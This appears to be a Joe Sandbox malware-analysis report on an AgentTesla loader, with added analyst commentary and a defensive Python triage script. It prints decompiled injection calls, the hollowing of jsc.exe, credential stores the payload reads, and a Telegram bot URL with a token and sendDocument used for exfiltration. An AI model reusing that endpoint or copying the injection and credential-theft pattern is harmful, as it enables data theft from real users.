                      Source: Amcache.hve.7.dr; Binary or memory string: VMware, Inc.
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Amcache.hve.7.dr; Binary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.7.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.7.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.7.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.7.dr; Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                      Source: Amcache.hve.7.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMWARE
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: Amcache.hve.7.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware SVGA II
                      Source: Amcache.hve.7.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.7.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: jsc.exe, 00000003.00000002.3311348470.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.7.dr; Binary or memory string: vmci.sys
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: Amcache.hve.7.dr; Binary or memory string: vmci.syshbin`
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmware
                      Source: Amcache.hve.7.dr; Binary or memory string: \driver\vmci,\driver\pci
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Amcache.hve.7.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.7.dr; Binary or memory string: VMware20,1
                      Source: Amcache.hve.7.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.7.dr; Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.7.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.7.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.7.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.7.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.7.dr; Binary or memory string: VMware PCI VMCI Bus Device
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: Amcache.hve.7.dr; Binary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.7.dr; Binary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.7.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.7.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe; Process queried: DebugPort
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe; Process queried: DebugPort
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe; Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

Source: PO-inv-CQV20(92315).exe, -----.cs :: Reference to suspicious API methods: ((_0602_FBC6)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FDE7(_06EA._FDC8_FDEB_FDE5_06EA_06DC)), _FDE7(_06EA._FD44_0670_065B_061C_06EA)), typeof(_0602_FBC6)))("vpGUntmDH2Bs", out var _)
Source: PO-inv-CQV20(92315).exe, -----.cs :: Reference to suspicious API methods: ((_0602_FBC6)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FDE7(_06EA._FDC8_FDEB_FDE5_06EA_06DC)), _FDE7(_06EA._FD44_0670_065B_061C_06EA)), typeof(_0602_FBC6)))("vpGUntmDH2Bs", out var _)
Source: PO-inv-CQV20(92315).exe, -----.cs :: Reference to suspicious API methods: VirtualProtect(procAddress, (uint)array.Length, 64u, out var _FDEE_061E_FBD0_060D_06E4_FBB7_0657_FDD9_06D9)
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, Ljq6xD21ACX.cs :: Reference to suspicious API methods: OZkujShDCVG.OpenProcess(aPNZ30.DuplicateHandle, bInheritHandle: true, (uint)snUp2.ProcessID)
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 402000
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 43C000
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 43E000
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 9B7008
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Queries volume information: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.7.dr :: Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr :: Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr :: Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr :: Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr :: Binary or memory string: MsMpEng.exe

The decompiled rows show the loader resolving Win32 functions at run time (LoadLibrary, then GetProcAddress, then Marshal.GetDelegateForFunctionPointer, with the library and function names coming out of an obfuscated string table) and calling VirtualProtect with 64u, which is PAGE_EXECUTE_READWRITE (0x40), on an existing function address so that the bytes in array can be written over it. The memory rows are the injection itself: jsc.exe, the signed .NET JScript compiler that normally takes a script on its command line, is started with no arguments, an RWX region is allocated at its image base 0x400000, a PE header (4D5A, "MZ") is written there followed by further writes at 0x402000, 0x43C000 and 0x43E000, and the unpacked AgentTesla payload (3.2.jsc.exe.400000.0.unpack in the Yara rows below) then runs inside jsc.exe. The msmpeng.exe paths come from Amcache.hve, the analysis host's own hive, and record the Windows Defender builds installed on the sandbox rather than strings carried by the sample.

                      Stealing of Sensitive Information

Source: Yara match :: File source: sslproxydump.pcap, type: PCAP
Source: Yara match :: File source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000003.00000002.3307185247.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
Source: Yara match :: File source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR

Source: Yara match :: File source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
Source: Yara match :: File source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe :: Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

All of the credential-store access is performed by jsc.exe, i.e. by the injected payload, not by the dropped loader: Login Data is the Chromium (Chrome/Edge) password database, profiles.ini is the profile index that Firefox-family browsers (Firefox, Cyberfox, BlackHawk) and Thunderbird keep in front of their logins.json/key4.db, WinSCP 2\Sessions holds saved WinSCP sessions, Ftplist.txt is FTP Navigator's site list, Windows Messaging Subsystem\Profiles holds MAPI/Outlook account profiles, and IncrediMail\Identities its mail identities.

Source: Yara match :: File source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
Source: Yara match :: File source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR
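The anti-VM, injection and credential-access rows above are three different signals that an analyst usually has to pull apart by hand. The script below is an added example, not part of the Joe Sandbox report: it parses rows in the shape shown on this page (re-typed with a space between the source column and the event column, since the rendered page fuses them) and produces the three findings a triage note needs. The input rows are constructed from this report; the separation of Amcache.hve strings from sample strings, the hollowing pattern (child created, RWX allocation and an MZ header written at the same base) and the credential-store table are the author's interpretation, not Joe Sandbox logic.

```python
"""Turn Joe Sandbox-style behaviour rows into three findings: which VM-artifact strings
belong to the sample, the process-hollowing chain, and credential-store access."""
import json
import re
from collections import defaultdict

# Constructed input: rows from the report above, re-typed with a space between the
# "Source:" column and the event column (the rendered page fuses them). Not a Joe export.
LOADER = r"C:\Users\user\Desktop\PO-inv-CQV20(92315).exe"
JSC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
MEM = ("PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000"
       ".00000004.00000800.00020000.00000000.sdmp")
REPORT_LINES = [
    f"Source: {MEM} Binary or memory string: C:\\WINDOWS\\system32\\drivers\\vmmouse.sys",
    f"Source: {MEM} Binary or memory string: SOFTWARE\\VMware, Inc.\\VMware Tools",
    "Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device",
    "Source: Amcache.hve.7.dr Binary or memory string: vmci.sys",
    f'Source: {LOADER} Process created: {JSC} "{JSC}"',
    f"Source: {LOADER} Memory allocated: {JSC} base: 400000 protect: page execute and read and write",
    f"Source: {LOADER} Memory written: {JSC} base: 400000 value starts with: 4D5A",
    f"Source: {LOADER} Memory written: {JSC} base: 402000",
    f"Source: {JSC} File opened: C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
    f"Source: {JSC} Key opened: HKEY_CURRENT_USER\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions",
    f"Source: {JSC} File opened: C:\\Users\\user\\AppData\\Roaming\\Thunderbird\\profiles.ini",
]

EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?) (?P<event>Binary or memory string|Process created|Memory allocated"
    r"|Memory written|File opened|Key opened): (?P<detail>.*)$")
VM_MARKERS = ("vmware", "vmmouse", "vmhgfs", "vmci", "vbox", "hyper-v", "virtual disk")
CRED_STORES = [  # (regex on the opened path or key, what that store is)
    (r"\\(Chrome|Edge)\\User Data\\.*\\Login Data$", "Chromium login database"),
    (r"\\Mozilla\\Firefox\\profiles\.ini$", "Firefox profile index"),
    (r"\\Thunderbird\\profiles\.ini$", "Thunderbird profile index"),
    (r"\\WinSCP 2\\Sessions$", "WinSCP saved sessions"),
    (r"\\Windows Messaging Subsystem\\Profiles$", "MAPI/Outlook profiles"),
    (r"\\IncrediMail\\Identities$", "IncrediMail identities"),
    (r"\\FTP Navigator\\Ftplist\.txt$", "FTP Navigator site list"),
]


def parse(lines):
    """Keep only the row types handled here, as dicts with src/event/detail."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def vm_artifacts(events):
    """Split VM-related strings by origin. Amcache.hve*.dr is a dropped copy of the analysis
    VM's own application-compatibility hive, so its VMware/Hyper-V strings describe the
    sandbox hardware; only strings inside the sample's memory point at anti-VM code."""
    out = {"sample": [], "host_artifact": []}
    for e in events:
        if e["event"] != "Binary or memory string":
            continue
        if any(k in e["detail"].lower() for k in VM_MARKERS):
            bucket = "host_artifact" if e["src"].lower().startswith("amcache.hve") else "sample"
            out[bucket].append(e["detail"])
    return out


def hollowing_chains(events):
    """Per child image: was it created, which bases got RWX, and where an MZ header landed.
    All three on one base is the hollowing pattern: a PE written over the child's image."""
    state = defaultdict(lambda: {"created": False, "rwx": set(), "mz": set()})
    for e in events:
        d = e["detail"]
        if e["event"] == "Process created":
            state[d.split(' "')[0]]["created"] = True
        elif e["event"] == "Memory allocated":
            m = re.match(r"(?P<img>.+?) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$", d)
            if m and "execute" in m["prot"] and "write" in m["prot"]:
                state[m["img"]]["rwx"].add(int(m["base"], 16))
        elif e["event"] == "Memory written":
            m = re.match(r"(?P<img>.+?) base: (?P<base>[0-9A-Fa-f]+)"
                         r"(?: value starts with: (?P<head>\S+))?$", d)
            if m and m["head"] and m["head"].upper().startswith("4D5A"):
                state[m["img"]]["mz"].add(int(m["base"], 16))
    return [(img, sorted(s["rwx"] & s["mz"])) for img, s in state.items()
            if s["created"] and s["rwx"] & s["mz"]]


def credential_access(events):
    """Map file/registry opens by any process onto known credential stores."""
    hits = []
    for e in events:
        if e["event"] in ("File opened", "Key opened"):
            for pat, label in CRED_STORES:
                if re.search(pat, e["detail"], re.IGNORECASE):
                    hits.append((e["src"], label, e["detail"]))
                    break
    return hits


def summarize(lines):
    events = parse(lines)
    return {"vm_strings": vm_artifacts(events), "hollowing": hollowing_chains(events),
            "credential_access": credential_access(events)}


if __name__ == "__main__":
    print(json.dumps(summarize(REPORT_LINES), indent=2, default=str))
```

On the rows above this yields two sample-origin anti-VM strings and two host artefacts, one hollowing chain (jsc.exe, base 0x400000) and three credential-store reads, all attributed to jsc.exe rather than to the loader. The source attribution is the part worth keeping: a detection written from the Amcache rows would fire on every VMware guest, while one written from the sample-memory rows and the jsc.exe write sequence would not.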

                      Remote Access Functionality

Source: Yara match :: File source: sslproxydump.pcap, type: PCAP
Source: Yara match :: File source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000003.00000002.3307185247.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
Source: Yara match :: File source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR

Source: Yara match :: File source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
Source: Yara match :: File source: Process Memory Space: jsc.exe PID: 5868, type: MEMORYSTR
MITRE ATT&CK Matrix

The matrix was flattened cell by cell in the extract; it is rebuilt here one tactic column at a time. A leading number is the badge the matrix shows on a technique that the sample's signatures mapped to, reproduced as rendered; entries without a number are the matrix's fixed background techniques and did not match.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 121 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 13 Virtualization/Sandbox Evasion; 1 Disable or Modify Tools; 311 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 231 Security Software Discovery; 13 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 24 System Information Discovery; Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Email Collection; 1 Input Capture; 11 Archive Collected Data; 2 Data from Local System; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection

Source: PO-inv-CQV20(92315).exe | Detection: 25% | Scanner: ReversingLabs | Label: Win64.Trojan.Generic
Source: PO-inv-CQV20(92315).exe | Detection: 23% | Scanner: Virustotal
The report's four remaining antivirus tables contain no matches.

Domains

Name: api.telegram.org | IP: 149.154.167.220 | Active: true | Malicious: false | Reputation: high

Contacted URLs

Name: https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument | Malicious: false | Reputation: high

URLs from memory and binary strings

Name: https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/ | Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: http://upx.sf.net | Source: Amcache.hve.7.dr | Malicious: false | Reputation: high
